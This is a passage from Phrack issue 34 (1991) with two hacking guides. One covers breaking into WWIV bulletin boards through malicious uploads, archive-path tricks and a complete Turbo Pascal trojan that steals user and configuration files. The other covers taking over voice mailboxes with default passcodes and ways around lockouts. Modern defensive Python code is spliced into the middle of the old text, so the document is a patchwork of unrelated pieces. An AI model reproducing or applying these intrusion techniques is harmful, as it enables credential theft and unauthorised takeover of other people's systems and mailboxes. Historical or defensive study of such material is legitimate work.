Although email can be sent through the Internet gateway, surcharged services, such as Telex, FAX, COD, U.S. Mail, overnight, urgent mail and messages destined to other ADMDs connected to AT&T Mail are not deliverable. If you are an Internet e-mail user attempting to use a surcharged service and are not registered on AT&T Mail, you will not be able to send your message, and will be automatically notified. Below is a list of surcharged services that are unavailable to Internet users.

     * FAX
     * Telex
     * COD
     * U.S. Mail
     * Overnight
     * Administrative Management Domain (ADMD) Messages

Sending Email to Bitnet Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To send email to BITNET users from AT&T Mail, enter:

     internet!host.bitnet!user

Sending Email to UUNET Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To send email to UUNET users from AT&T Mail via the Internet Gateway, enter:

     attmail!internet!uunet!system!user

Internet Restrictions
~~~~~~~~~~~~~~~~~~~~~
The following commercial restrictions apply to the use of the Internet Gateway.
     * Users are prohibited from using the Internet to carry traffic between commercial (for profit) electronic messaging systems.
     * Advertising and soliciting, i.e., messages offering goods or services for sale or offers of jobs.
     * Provision of for-profit service, other than electronic messaging to Internet users, is permitted (e.g., database services) if such service is used for scholarly research purposes and its costs are borne by individual or institutional subscription.
_______________________________________________________________________________

==Phrack Inc.==

                 Volume Three, Issue Thirty-four, File #5 of 11

                 ***                                    ***
                 ***                                    ***
                 ***          The Complete Guide        ***
                 ***          to Hacking WWIV           ***
                 ***                                    ***
                 ***             by Inhuman             ***
                 ***           September 1991           ***
                 ***                                    ***
                 ***                                    ***

WWIV is one of the most popular BBS programs in the country. With thousands of boards in WWIVnet and hundreds in the spinoff WWIVlink, there is a lot of support and community. The nice thing about WWIV is that it is very easy to set up. This makes it popular among the younger crowd of sysops who can't comprehend the complexities of fossil drivers and batch files.

In this file, I will discuss four methods of hacking WWIV to achieve sysop access and steal the user and configuration files. Just remember the number one rule of hacking: Don't destroy, alter, or create files on someone else's computer, unless it's to cover your own trail. Believe me, there is nothing lower than the scum who hack BBSes for the sheer pleasure of formatting someone else's hard drive. But there is nothing wrong (except legally) with hacking a system to look at the sysop's files, get phone numbers, accounts, etc. Good luck.

***
*** Technique #1: The Wildcard Upload
***

This technique will only work on a board running an unregistered old version of DSZ and a version of WWIV previous to v4.12.
It is all based on the fact that if you do a wildcard upload (*.*), whatever file you upload will go into the same directory as DSZ.COM, which is often the main BBS directory. So there are several methods of hacking using this technique.

If the sysop is running an unmodified version of WWIV, you can simply compile a modded version of it with a backdoor and overwrite his copy. Your new copy will not be loaded into memory until the BBS either shrinks out (by running an onliner or something), or the sysop terminates the BBS and runs it again.

You can also have some fun with two strings that WWIV always recognizes at the NN: prompt: "!@-NETWORK-@!" and "!@-REMOTE-@!". The first is used by WWIVnet to tell the BBS that it is receiving a net call. If the BBS is part of a network and you type "!@-NETWORK-@!", it will then wait for the network password and other data. If the board is not part of a network, it will just act like you typed an invalid user name. The second string is reserved for whatever programs people wanted to write for WWIV, like an off-line reader or whatever. Snarf (the file leeching utility) uses this. If there is not a REMOTE.EXE or REMOTE.COM in the main BBS directory, it will also act as if you entered an invalid user name.

So, what you can do is wildcard upload either REMOTE.COM or NETWORK.COM. You want to call them COM files, because if the EXE files already exist, the COM ones will be called first. If the BBS is part of a network, you should go for REMOTE.COM, because if you do NETWORK.COM, it will screw up network communications and the sysop will notice a lot faster. Of course, if you're going straight in for the kill, it doesn't matter.

So, what should NETWORK.COM or REMOTE.COM actually be? you ask. Well, you can try renaming COMMAND.COM to one of those two, which would make a DOS shell for you when it was executed. This is tricky, though, because you need to know his DOS version.
I suggest a batch file, compiled to a COM file using PC Mag's BAT2EXEC. You can make the batch file have one line:

     \COMMAND

That way you don't have to worry about DOS versions.

Remember that this method of hacking WWIV is almost completely obsolete. It is just included for reference, or for some old board run from an empty house where the sysop logs on twice a year or something.

***
*** Technique #2: The PKZIP Archive Hack
***

Probably the most vulnerable part of WWIV is the archive section. This section allows users to unZIP files to a temporary directory and ZIP the files you want into a temporary ZIP file, then download it. This is useful if you download a file from another board, but one file in it is corrupted. This way you don't have to re-download the whole file. Anyway, on with the show.

Make a zip file that contains a file called PKZIP.BAT or COM or EXE. It doesn't matter. This file will be executed, so make it whatever you want, just like in Technique #1. Make it COMMAND.COM, or a batch file, or a HD destroyer, whatever you want.

So you upload this file, and then type "E" to extract it. It'll ask you what file to extract and you say the name of the file you just uploaded. It'll then say "Extract What? " and you say "*.*". It'll then unzip everything (your one file) into the TEMP directory. Then go to the archive menu ("G") and pick "A" to add a file to archive. It'll ask what file you want to add, and say anything, it doesn't matter. At this point it will try to execute the command:

     PKZIP TEMP.ZIP \TEMP\%1

Where %1 is what you just entered. The file pointer is already pointing to the temp directory, so instead of executing PKZIP from the DOS path, it'll execute the file sitting in the current directory, TEMP. So then it runs PKZIP and you get your DOS shell or whatever.

If PKZIP does not work, you may want to try uploading another file, and use the same technique, but instead make it an ARC file and call the file in the archive PKPAK.
This technique is relatively easy to defeat from the sysop's end, but often they are too lazy, or just haven't heard about it.

***
*** Technique #3: The -D Archive Hack
***

This technique also plays on the openness of WWIV's archive system. This is another method of getting a file into the root BBS directory, or anywhere on the hard drive, for that matter.

First, create a temporary directory on your hard drive. It doesn't matter what it's called. We'll call it TEMP. Then, make a sub-directory of TEMP called AA. It can actually be called any two-character combination, but we'll keep it nice and simple. Then make a subdirectory of AA called WWIV. Place NETWORK.COM or REMOTE.COM or whatever in the directory \TEMP\AA\WWIV. Then from the TEMP directory execute the command:

     PKZIP -r -P STUFF.ZIP        <--- The case of "r" and "P" is important.

This will create a zip file of all the contents of the directories, but with all of the directory names recursed and stored. So if you do a PKZIP -V to list the files you should see AA\WWIV\REMOTE.COM, etc.

Next, load STUFF.ZIP into a hex editor, like Norton Utilities, and search for "AA". When you find it (it should occur twice), change it to "C:". It is probably a good idea to do this twice, once with the subdirectory called WWIV, and another with it called BBS, since those are the two most common main BBS directory names for WWIV. You may even want to try D: or E: in addition to C:.

You could even work backwards, by forgetting the WWIV subdirectory, and just making it AA\REMOTE.COM, and changing the "AA" to "..". This would be foolproof. You could work from there, doing "..\..\DOS\PKZIP.COM" or whatever.

Then upload STUFF.ZIP (or whatever you want to call it) to the BBS, and type "E" to extract it to a temporary directory. It'll ask you what file. Type "STUFF.ZIP". It'll ask what you want to extract. Type ""-D (that is, two quotation marks followed by -D). It'll then execute:

     PKUNZIP STUFF.ZIP ""-D

It will unzip everything into the proper directory. Voila.
The quotation marks are ignored by PKUNZIP and are only there to trip up WWIV v4.20's check for the hyphen. This method can only be defeated by modifying the source code, or taking out the calls to any PKZIP or PKUNZIP programs in INIT, but then you lose your archive section.

***
*** Technique #4: The Trojan Horse File-Stealer
***

This method, if executed properly, is almost impossible to defeat, and will conceivably work on any BBS program, if you know the directory structure well enough. Once again, you need PC Mag's BAT2EXEC, or enough programming experience to write a program that will copy files from one place to another.

The basic principle is this: You get the sysop to run a program that you upload. This program copies \WWIV\DATA\USER.LST and \WWIV\CONFIG.DAT *over* files that already exist in the transfer or gfiles area. You then go download those files and you have the two most important files that exist for WWIV.

Now, you need to do a certain amount of guess-work here. WWIV has its directories set up like this:

                          --- TEMP
                          I                --- DIR1
                          I                I
                          I--- DLOADS -----I--- DIR2
                          I                I
                          I                --- DIR3
                 WWIV-----I--- DATA
                          I                --- GDIR1
                          I                I
                          I--- GFILES -----I--- GDIR2
                          I                I
                          I                --- GDIR3
                          --- MSGS

The sysop sets the names for the DIR1, DIR2, etc. Often you have names like UPLOADS, GAMES, UTILS, etc. For the gfile dirs you might have GENERAL, HUMOR, whatever. So you have to make a guess at the sysop's directory names. Let's say he never moves his files from the upload directory. Then do a directory list from the transfer menu and pick two files that you don't think anyone will download. Let's say you see:

     RABBIT  .ZIP   164k : The History of Rabbits from Europe to the U.S.
     SCD     .COM    12k : SuperCD - changes dirs 3% faster than DOS's CD!
So you then might write a batch file like this:

     @ECHO OFF
     COPY \WWIV\DATA\USER.LST \WWIV\DLOADS\UPLOADS\RABBIT.ZIP
     COPY \BBS\DATA\USER.LST \BBS\DLOADS\UPLOADS\RABBIT.ZIP
     COPY \WWIV\CONFIG.DAT \WWIV\DLOADS\UPLOADS\SCD.COM
     COPY \BBS\CONFIG.DAT \BBS\DLOADS\UPLOADS\SCD.COM

You'd then compile it to a COM file and upload it to the sysop directory. Obviously this file is going to be pretty small, so you have to make up a plausible use for it. You could say it's an ANSI screen for your private BBS, and the sysop is invited. This is good if you have a fake account as the president of some big cracking group. You wouldn't believe how gullible some sysops are. At any rate, use your imagination to get him to run the file. And make it sound like he shouldn't distribute it, so he won't put it in some public access directory.

There is a problem with simply using a batch file. The output will look like:

             1 file(s) copied.
     File not found.
             1 file(s) copied.
     File not found.

That might get him curious enough to look at it with a hex editor, which would probably blow everything. That's why it's better to write a program in your favorite language to do this. Here is a program that searches specified drives and directories for CONFIG.DAT and USER.LST and copies them over the files of your choice. It was written in Turbo Pascal v5.5:

Program CopyThisOverThat;

{ Change the dir names to whatever you want.  If you change the number of
  locations it checks, be sure to change the "num" constants as well }

uses dos;

const
  NumMainDirs = 5;
  MainDirs: array[1..NumMainDirs] of string[8] = ('BBS','WWIV','WORLD',
                                                  'BOARD','WAR');
  NumGfDirs = 3;
  GFDirs: array[1..NumGFDirs] of string[8] = ('DLOADS','FILES','UPLOADS');
  NumSubGFDirs = 2;
  SubGFDirs: array[1..NumSubGFDirs] of string[8] = ('UPLOADS','MISC');
  NumDirsToTest = 3;
  DirsToTest: array[1..NumDirsToTest] of string[3] = ('C:\','D:\','E:\');
                                   {ok to test for one that doesn't exist}

  {Source file names include paths from the MAIN BBS subdir (e.g. "BBS") }
  SourceFileNames: array[1..2] of string[25] = ('DATA\USER.LST','DATA\CONFIG.DAT');
  { Dest file names are from subgfdirs }
  DestFileNames: array[1..2] of string[12] = ('\BDAY.MOD','\TVK.ZIP');

var
  p, q, r, x, y, dirN: byte;
  bigs: word;
  CurDir, BackDir: string[80];
  f1, f2: file;
  Info: pointer;
  ok: boolean;

Procedure Sorry;
var
  x, y: integer;
begin
  for y := 1 to 1000 do
    for x := 1 to 100 do ;
  Writeln;
  Writeln ('');          {change to something like "Abnormal program termination"}
  Writeln;
  ChDir(BackDir);
  Halt;
end;

begin
  Write ('');            {change to something like "Loading..."}
  {$I-}
  GetDir (0, BackDir);
  ChDir('\');
  for dirn := 1 to NumDirsToTest do
  begin
    ChDir(DirsToTest[dirn]);
    if IOResult = 0 then
    begin
      for p := 1 to NumMainDirs do
      begin
        ChDir (MainDirs[p]);
        if (IOResult <> 0) then
        begin
          if (p = NumMainDirs) and (dirn = NumDirsToTest) then Sorry;
        end
        else
        begin
          p := NumMainDirs;
          for q := 1 to NumGFDirs do
          begin
            ChDir (GFDirs[q]);
            if (IOResult <> 0) then
            begin
              if (q = NumGFDirs) and (dirn = NumDirsToTest) then Sorry;
            end
            else
            begin
              q := NumGFDirs;
              for r := 1 to NumSubGFDirs do
              begin
                ChDir (SubGFDirs[r]);
                if (IOResult <> 0) then
                begin
                  if r = NumSubGFDirs then Sorry;
                end
                else
                begin
                  r := NumSubGFDirs;
                  dirn := NumDirsToTest;
                  ok := true;
                end;
              end;
            end;
          end;
        end;
      end;
    end;
  end;
  GetDir (0, CurDir);
  ChDir ('..');
  ChDir ('..');
  for x := 1 to 2 do
  begin
    Assign (f1, SourceFileNames[x]);
    Assign (f2, CurDir+DestFileNames[x]);
    Reset (f1, 1);
    if IOResult <> 0 then
    begin
      if x = 2 then Sorry;
    end
    else
    begin
      ReWrite (f2, 1);
      Bigs := FileSize(f1);
      GetMem(Info, Bigs);
      BlockRead(f1, Info^, Bigs);
      BlockWrite (f2, Info^, Bigs);
      FreeMem(Info, Bigs);
    end;
  end;
  Sorry;
end.

So hopefully the sysop runs this program and emails you with something like "Hey it didn't work bozo!". Or you could make it work. You could actually stick a BBS ad in the program or whatever. It's up to you. At any rate, now you go download those files that it copied the USER.LST and CONFIG.DAT over.
You can type out the CONFIG.DAT and the first word you see in all caps is the system password. There are several utilities for WWIV that let you compile the USER.LST to a text file. You can find something like that on a big WWIV board, or you can try to figure it out with a text or hex editor. At any rate, once you have those two files, you're in good shape.

You could also use a batch file like that in place of one that calls COMMAND.COM for something like REMOTE.COM. It's up to you.

***
*** Hacking Prevention
***

So you are the sysop of a WWIV board, and are reading this file with growing dismay. Have no fear, if you have patience, almost all of these methods can be fixed.

To eliminate the wildcard upload, all you have to do is get a current copy of WWIV (4.20), and the latest version of DSZ. It's all been fixed.

To fix the PKZIP archive hack, simply specify a path in INIT in all calls to PKZIP, PKUNZIP, PKPAK, PKUNPAK, and any other archive programs you have. So your command lines should look like:

     \DOS\PKZIP -V %1

Or something similar. That will fix that nicely.

To eliminate the -D method, you have to make some modifications to the source code if you want to keep your archive section. Goose, sysop of the Twilight Zone BBS in VA, puts out a NOHACK mod, which is updated regularly. It fixes ALL of these methods except the last. The latest version of NOHACK is v2.4. If you are a WWIV sysop, put it in.

I can think of two ways to stop the last method, but neither of them are easy, and both require source code modifications. You could keep track of the filesize of a file when it's uploaded. Then when someone goes to download it, you could check the actual filesize with the size when it was uploaded. If they differ, it wouldn't let you download it. You could do the same with the date. Although either method could be gotten around with enough patience.
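The fixes above, written out as checks a BBS could apply. This is an added example, not WWIV's own code or the NOHACK mod: a fixed archiver path, a filespec filter that refuses the ""-D form from Technique #3, a zip entry-name filter for the patched C:\ and ..\ paths, and the upload-size check the last paragraph describes, extended here with a digest so a same-size overwrite is also caught. The \DOS\ tool locations are assumed.

```python
"""Defensive checks for the WWIV archive and transfer weaknesses above."""

import hashlib
import re
from typing import Dict, Tuple

# Fixed archiver locations (assumed).  INIT's command lines should name these
# instead of a bare PKZIP/PKUNZIP, so a PKZIP.COM planted in TEMP is never run.
ARCHIVERS = {
    "PKZIP": r"\DOS\PKZIP.EXE",
    "PKUNZIP": r"\DOS\PKUNZIP.EXE",
    "PKPAK": r"\DOS\PKPAK.EXE",
    "PKUNPAK": r"\DOS\PKUNPAK.EXE",
}

# A bare DOS 8.3 name or wildcard pattern.  No path separators, drive letters,
# quotes, blanks or hyphens, so ""-D and -D never reach the archiver at all.
_FILESPEC = re.compile(r"^[A-Za-z0-9_*?]{1,8}(\.[A-Za-z0-9_*?]{0,3})?$")


def safe_filespec(spec: str) -> bool:
    """True only for something like README.TXT, STUFF.ZIP or *.*"""
    return bool(_FILESPEC.match(spec))


def archive_command(tool: str, *user_args: str) -> str:
    """Build the command line the BBS would shell out to.

    Switches are never taken from the user; every user-supplied argument must
    pass safe_filespec() or the whole command is refused.
    """
    try:
        exe = ARCHIVERS[tool.upper()]
    except KeyError:
        raise ValueError(f"unknown archiver {tool!r}") from None
    for arg in user_args:
        if not safe_filespec(arg):
            raise ValueError(f"refusing archiver argument {arg!r}")
    return " ".join([exe, *user_args])


def safe_zip_entry(name: str) -> bool:
    """Reject stored entry names that would land outside the extraction dir.

    Catches the C:\\WWIV\\REMOTE.COM and ..\\REMOTE.COM forms made by patching
    a -r -P archive, plus absolute paths and wildcards in stored names.
    """
    if re.match(r"^[A-Za-z]:", name):          # drive letter prefix
        return False
    if name.startswith(("\\", "/")):           # absolute path
        return False
    parts = re.split(r"[\\/]", name)
    if any(p in ("", ".", "..") for p in parts):
        return False
    return all(safe_filespec(p) and "*" not in p and "?" not in p for p in parts)


# Upload ledger: file name -> (size, sha256 hex) recorded when the upload
# completed.  The text suggests size and date; the digest is this example's
# stronger generalization of the same idea.
UploadLedger = Dict[str, Tuple[int, str]]


def record_upload(ledger: UploadLedger, name: str, data: bytes) -> None:
    ledger[name.upper()] = (len(data), hashlib.sha256(data).hexdigest())


def verify_before_download(ledger: UploadLedger, name: str, data: bytes) -> bool:
    """False if the file on disk no longer matches what was uploaded (or was
    never recorded), which is exactly what Technique #4's COPY leaves behind."""
    expected = ledger.get(name.upper())
    if expected is None:
        return False
    return expected == (len(data), hashlib.sha256(data).hexdigest())


if __name__ == "__main__":
    print(archive_command("PKUNZIP", "STUFF.ZIP", "*.*"))
    for spec in ('""-D', "-D", "..\\REMOTE.COM"):
        print(f"{spec!r:20} filespec ok: {safe_filespec(spec)}")
    for entry in ("AA\\WWIV\\REMOTE.COM", "C:\\WWIV\\REMOTE.COM", "..\\REMOTE.COM"):
        print(f"{entry!r:25} entry ok: {safe_zip_entry(entry)}")
    ledger: UploadLedger = {}
    record_upload(ledger, "RABBIT.ZIP", b"constructed rabbit history")   # constructed data
    print("unchanged:", verify_before_download(ledger, "RABBIT.ZIP", b"constructed rabbit history"))
    print("overwritten:", verify_before_download(ledger, "RABBIT.ZIP", b"constructed USER.LST bytes"))
```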
For a virtually unhackable system, voice validate all users, have all uploads go to the sysop directory so you can look over them first, and don't run any programs. Of course, this is very tedious, but that is the price of a secure BBS.

***
*** Thanks
***

Thanks to Fenris Wolf for teaching me about the -D method, to Steve for help with the CopyThisOverThat program, and to Insight for proofing this file.
*******************************************************************************

==Phrack Inc.==

                 Volume Three, Issue Thirty-four, File #6 of 11

                           HACKING VOICE MAIL SYSTEMS

                                by Night Ranger

DISCLAIMER

I, Night Ranger, or anyone else associated with Phrack, am not responsible for anything the readers of this text may do. This file is for informational and educational purposes only and should not be used on any system or network without written permission of the authorized persons in charge.

INTRODUCTION

I decided to write this text file because I received numerous requests for vmbs from people. Vmbs are quite easy to hack, but if one doesn't know where to start it can be hard. Since there aren't any decent text files on this subject, I couldn't refer them to read anything, and decided to write one myself. To the best of my knowledge, this is the most complete text on hacking vmb systems. If you have any comments or suggestions, please let me know.

Voice Mail Boxes (vmbs) have become a very popular way for hackers to get in touch with each other and share information. Probably the main reason for this is their simplicity and availability. Anyone can call a vmb regardless of their location or computer type. Vmbs are easily accessible because most are toll free numbers, unlike bulletin boards. Along with their advantages, they do have their disadvantages. Since they are easily accessible this means not only hackers and phreaks can get information from them, but feds and narcs as well. Often they do not last longer than a week when taken improperly.
After reading this file and practicing the methods described, you should be able to hack voice mail systems with ease. With these thoughts in mind, let's get started.

FINDING A VMB SYSTEM

The first thing you need to do is find a VIRGIN (unhacked) vmb system. If you hack on a system that already has hackers on it, your chance of finding a box is considerably less and it increases the chance that the system administrator will find the hacked boxes. To find a virgin system, you need to SCAN some 800 numbers until you find a vmb. A good idea is to take the number of a voice mail system you know, and scan the same exchange but not close to the number you have.

FINDING VALID BOXES ON THE SYSTEM

If you get a high quality recording (not an answering machine) then it is probably a vmb system. Try entering the number 100, the recording should stop. If it does not, you may have to enter a special key (such as '*' '#' '8' or '9') to enter the voice mail system. After entering 100 it should either connect you to something or do nothing. If it does nothing, keep entering (0)'s until it does something. Count the number of digits you entered and this will tell you how many digits the boxes on the system are. You should note that many systems can have more than one box length depending on the first number you enter, Eg. Boxes starting with a six can be five digits while boxes starting with a seven can only be four. For this file we will assume you have found a four digit system, which is pretty common. It should do one of the following things...

     1) Give you an error message, Eg. 'Mailbox xxxx is invalid.'
     2) Ring the extension and then one of the following..
          1) Someone or no one answers.
          2) Connects you to a box.
     3) Connect you to mailbox xxxx.

If you get #1 then try some more numbers. If you get #2 or #3 then you have found a valid vmb (or extension in the case of 2-1). Extensions usually have a vmb for when they are not at their extension. If you get an extension, move on.
Where you find one box you will probably find more surrounding it. Sometimes a system will try to be sneaky and put one valid vmb per 10 numbers. Eg. Boxes would be at 105, 116, 121, ... with none in between. Some systems start boxes at either 10 after a round number or 100 after, depending on whether it is a three or four box system. For example, if you do not find any around 100, try 110 and if you do not find any around 1000 try 1100. The only way to be sure is to try EVERY possible box number. This takes time but can be worth it.

Once you find a valid box (even if you do not know the passcode) there is a simple trick to use when scanning for boxes outside of a vmb so that it does not disconnect you after three invalid attempts. What you do is try two box numbers and then the third time enter a box number you know is valid. Then abort (usually by pressing (*) or (#)) and it will start over again. From there you can keep repeating this until you find a box you can hack on.

FINDING THE LOGIN SEQUENCE

Different vmb systems have different login sequences (the way the vmb owner gets into his box). The most common way is to hit the pound (#) key from the main menu. This pound method works on most systems, including Aspens (more on specific systems later). It should respond with something like 'Enter your mailbox.' and then 'Enter your passcode.' Some systems have the asterisk (*) key perform this function.

Another login method is hitting a special key during the greeting (opening message) of the vmb. On a Cindy or Q Voice Mail system you hit the zero (0) key during the greet and since you've already entered your mailbox number it will respond with 'Enter your passcode.' If (0) doesn't do anything try (#) or (*).

These previous two methods of login are the most common, but it is possible some systems will not respond to these commands. If this should happen, keep playing around with it and trying different keys.
If for some reason you cannot find the login sequence, then save this system for later and move on.

GETTING IN

This is where the basic hacking skills come to use. When a system administrator creates a box for someone, they use what's called a default passcode. This same code is used for all the new boxes on the system, and often on other systems too. Once the legitimate owner logs into his new vmb, they are usually prompted to change the passcode, but not everyone realizes that someone will be trying to get into their mailbox and quite a few people leave their box with the default passcode or no passcode at all. You should try ALL the defaults I have listed first.

     DEFAULTS              BOX NUMBER     TRY
     box number (bn)       3234           3234      Most Popular
     bn backwards          2351           1532      Popular
     bn+'0'                323            3230      Popular With Aspens

Some additional defaults in order of most to least common are:

     4d      5d       6d
     0000    00000    000000    *MOST POPULAR*
     9999    99999    999999    *POPULAR*
     1111    11111    111111    *POPULAR*
     1234    12345    123456    *VERY POPULAR WITH OWNERS*
     4321    54321    654321
     6789    56789    456789
     9876    98765    987654
     2222    22222    222222
     3333    33333    333333
     4444    44444    444444
     5555    55555    555555
     6666    66666    666666
     7777    77777    777777
     8888    88888    888888
     1991

It is important to try ALL of these before giving up on a system. If none of these defaults work, try anything you think may be their passcode. Also remember that just because the system can have a four digit passcode the vmb owner does not have to use all four digits.

If you still cannot get into the box, either the box owner has a good passcode or the system uses a different default. In either case, move on to another box. If you seem to be having no luck, then come back to this system later. There are so many vmb systems you should not spend too much time on one hard system. If there's one thing I hate, it's a text file that says 'Hack into the system. Once you get in...' but unlike computer systems, vmb systems really are easy to get into. If you didn't get in, don't give up!
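The passcode policy an administrator could enforce when a box is created or its passcode changed, written against the default table above. This is an added example, not part of Night Ranger's file: it refuses every family the table lists (box number, backwards, box number padded with zeros, repeated digits, digit runs, 1991) and anything shorter than the system's passcode length; the sample box list is constructed.

```python
"""Passcode policy check derived from the default table in this file."""

from typing import List, Optional, Tuple


def _is_run(code: str) -> bool:
    """True for consecutive digits in either direction: 1234, 6789, 98765."""
    steps = {int(b) - int(a) for a, b in zip(code, code[1:])}
    return steps in ({1}, {-1})


def weak_passcode_reason(box: str, code: str, length: int = 4) -> Optional[str]:
    """Return why a passcode fails the policy, or None if it is acceptable.

    `length` is the system's passcode length (the file's 4d/5d/6d columns).
    """
    if not code.isdigit():
        return "passcode must be digits only"
    if len(code) < length:
        return f"shorter than the {length}-digit system length"
    if code in (box, box[::-1]):
        return "box number or box number backwards"
    if code.startswith(box) and set(code[len(box):]) <= {"0"}:
        return "box number padded with zeros"            # the bn+'0' default
    if len(set(code)) == 1:
        return "repeated single digit"                   # 0000, 9999, 1111 ...
    if _is_run(code):
        return "ascending or descending digit run"       # 1234, 4321, 6789 ...
    if code == "1991":
        return "year-style default"
    return None


def audit(boxes: List[Tuple[str, str]], length: int = 4) -> List[Tuple[str, str]]:
    """Run the policy over (box, passcode) pairs; return [(box, reason)] for failures."""
    findings = []
    for box, code in boxes:
        reason = weak_passcode_reason(box, code, length)
        if reason is not None:
            findings.append((box, reason))
    return findings


# Constructed sample of an administrator's box/passcode export.  The first
# three rows use the exact box numbers from the file's table.
SAMPLE_BOXES = [
    ("3234", "3234"),
    ("2351", "1532"),
    ("323", "3230"),
    ("4410", "0000"),
    ("4411", "1234"),
    ("4412", "9876"),
    ("4413", "1991"),
    ("4414", "72"),
    ("4415", "7205"),
]


if __name__ == "__main__":
    for box, reason in audit(SAMPLE_BOXES):
        print(f"box {box}: {reason}")
```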
Try another system and soon you will be in. I would say that 90% of all voice mail systems have a default listed above. All you have to do is find a box with one of the defaults.

ONCE YOU'RE IN

The first thing you should do is listen to the messages in the box, if there are any. Take note of the dates the messages were left. If they are more than four weeks old, then it is pretty safe to assume the owner is not using his box. If there are any recent messages on it, you can assume he is currently using his box. NEVER take a box in use. It will be deleted soon, and will alert the system administrator that people are hacking the system. This is the main reason vmb systems either go down, or tighten security. If you take a box that is not being used, it's probable no one will notice for quite a while.

SCANNING BOXES FROM THE INSIDE

From the main menu, see if there is an option to either send a message to another user or check receipt of a message. If there is you can search for VIRGIN (unused) boxes without being disconnected like you would from outside of a box. Virgin boxes have a 'generic' greeting and name. Eg. 'Mailbox xxx' or 'Please leave your message for mailbox xxx...' Write down any boxes you find with a generic greeting or name, because they will probably have the default passcode. Another sign of a virgin box is a name or greeting like 'This mailbox is for ...' or a woman's voice saying a man's name and vice versa, which is the system administrator's voice. If the box does not have this feature, simply use the previous method of scanning boxes from the outside.

For an example of interior scanning, when inside an Aspen box, choose (3) from the main menu to check for receipt. It will respond with 'Enter box number.' It is a good idea to start at a location you know there are boxes present and scan consecutively, noting any boxes with a 'generic' greeting. If you enter an invalid box it will alert you and allow you to enter another.
You can enter invalid box numbers forever, instead of the usual three incorrect attempts from outside a box.

TAKING A BOX

Now you need to find a box you can take over. NEVER take a box in use; it simply won't last. Deserted boxes (with messages from months ago) are the best and last the longest. Take these first. New boxes have a chance of lasting, but if the person for whom the box was created tries to login, you'll probably lose it. If you find a box with the system administrator's voice saying either the greeting or name (quite common), keeping it that way will prolong the box life, especially the name.

This is the most important step in taking over a box! Once you pick a box to take over, watch it for at least three days BEFORE changing anything! Once you think it's not in use, then change only the passcode, nothing else! Then login frequently for two to three days to monitor the box and make sure no one is leaving messages in it. Once you are pretty sure it is deserted, change your greeting to something like 'Sorry I'm not in right now, please leave your name and number and I'll get back to you.' DO NOT say 'This is Night Ranger dudes...' because if someone hears that it's good as gone. Keep your generic greeting for one week. After that week, if there are no messages from legitimate people, you can make your greeting say whatever you want.

The whole process of getting a good vmb (that will last) takes about 7-10 days, the more time you take the better chance you have of keeping it for a long time. If you take it over as soon as you get in, it'll probably last you less than a week. If you follow these instructions, chances are it will last for months.

When you take some boxes, do not take too many at one time. You may need some to scan from later. Plus listening to the messages of the legitimate users can supply you with needed information, such as the company's name, type of company, security measures, etc.
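The takeover sequence just described (a box idle for weeks, then a login immediately followed by a passcode change) is visible in a system's own activity log, which is where an administrator would look for it. This is an added example, not from Night Ranger's file; the log format and the sample lines are constructed, and the four-week idle threshold is taken from the text's "more than four weeks old".

```python
"""Flag dormant-mailbox takeovers from a voice mail system's activity log."""

from datetime import datetime, timedelta
from typing import Dict, List, Tuple

DORMANT = timedelta(days=28)    # owner silent this long: the text's "four weeks"
WINDOW = timedelta(hours=24)    # passcode change this soon after the return login

# Constructed log: "<ISO timestamp> <box> <event>", one event per line.
# Box 4102 is the textbook takeover; 4110 is a new box whose owner sets a
# passcode on first login; 4125 is a genuinely returning owner.
SAMPLE_LOG = """\
1991-08-01T09:12 4102 login
1991-08-01T09:13 4102 passcode_change
1991-08-03T10:05 4102 message_left
1991-09-19T02:11 4102 login
1991-09-19T02:12 4102 passcode_change
1991-09-26T01:50 4102 greeting_change
1991-09-18T16:00 4110 login
1991-09-19T08:00 4110 passcode_change
1991-07-30T11:00 4125 login
1991-09-20T12:00 4125 login
1991-09-20T12:03 4125 message_left
"""

Event = Tuple[datetime, str, str]


def parse_log(text: str) -> List[Event]:
    """Parse the constructed format into (timestamp, box, event), time-ordered."""
    events: List[Event] = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, box, event = line.split()
        events.append((datetime.fromisoformat(ts), box, event))
    events.sort()
    return events


def find_takeovers(events: List[Event]) -> List[Tuple[str, int, str]]:
    """Return (box, idle_days, passcode_change_time) for each suspect sequence.

    Rule: a login after >= DORMANT days of no logins puts the box under
    suspicion; a passcode change within WINDOW of that login is the finding.
    A returning owner who only reads messages is not flagged.
    """
    findings: List[Tuple[str, int, str]] = []
    last_login: Dict[str, datetime] = {}
    suspect: Dict[str, Tuple[datetime, int]] = {}   # box -> (return login, idle days)
    for ts, box, event in events:
        if event == "login":
            prev = last_login.get(box)
            if prev is not None and ts - prev >= DORMANT:
                suspect[box] = (ts, (ts - prev).days)
            last_login[box] = ts
        elif event == "passcode_change" and box in suspect:
            login_ts, idle = suspect.pop(box)
            if ts - login_ts <= WINDOW:
                findings.append((box, idle, ts.isoformat(timespec="minutes")))
    return findings


if __name__ == "__main__":
    for box, idle, when in find_takeovers(parse_log(SAMPLE_LOG)):
        print(f"box {box}: idle {idle} days, passcode changed at {when}")
```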
SYSTEM IDENTIFICATION

After you have become familiar with various systems, you will recognize them by their characteristic female (or male) voice and will know what defaults are most common and what tricks you can use. The following are a few popular vmb systems.

ASPEN is one of the best vmb systems with the most features. Many of them will allow you to have two greetings (a regular and an extended absence greeting), guest accounts, urgent or regular messages, and numerous other features. Aspens are easy to recognize because the female voice is very annoying and often identifies herself as Aspen. When you dial up an Aspen system, sometimes you have to enter an (*) to get into the vmb system. Once you're in you hit (#) to login. The system will respond with 'Mailbox number please?' If you enter an invalid mailbox the first time it will say 'Mailbox xxx is invalid...' and the second time it will say 'You dialed xxx, there is no such number...' and after a third incorrect entry it will hang up. If you enter a valid box, it will say the box owner's name and 'Please enter your passcode.' The most common default for Aspens is either box number or box number + (0). You only get three attempts to enter a correct box number and then three attempts to enter a correct passcode until it will disconnect you. From the main menu of an Aspen box you can enter (3) to scan for other boxes so you won't be hung up like you would from outside the box.

CINDY is another popular system. The system will start by saying 'Good Morning/Afternoon/Evening. Please enter the mailbox number you wish...' and is easy to identify. After three invalid box entries the system will say 'Good Day/Evening!' and hang up. To login, enter the box number and during the greet press (0) then your passcode. The default for ALL Cindy systems is (0). From the main menu you can enter (6) to scan for other boxes so you won't be hung up. Cindy voice mail systems also have a guest feature, like Aspens.
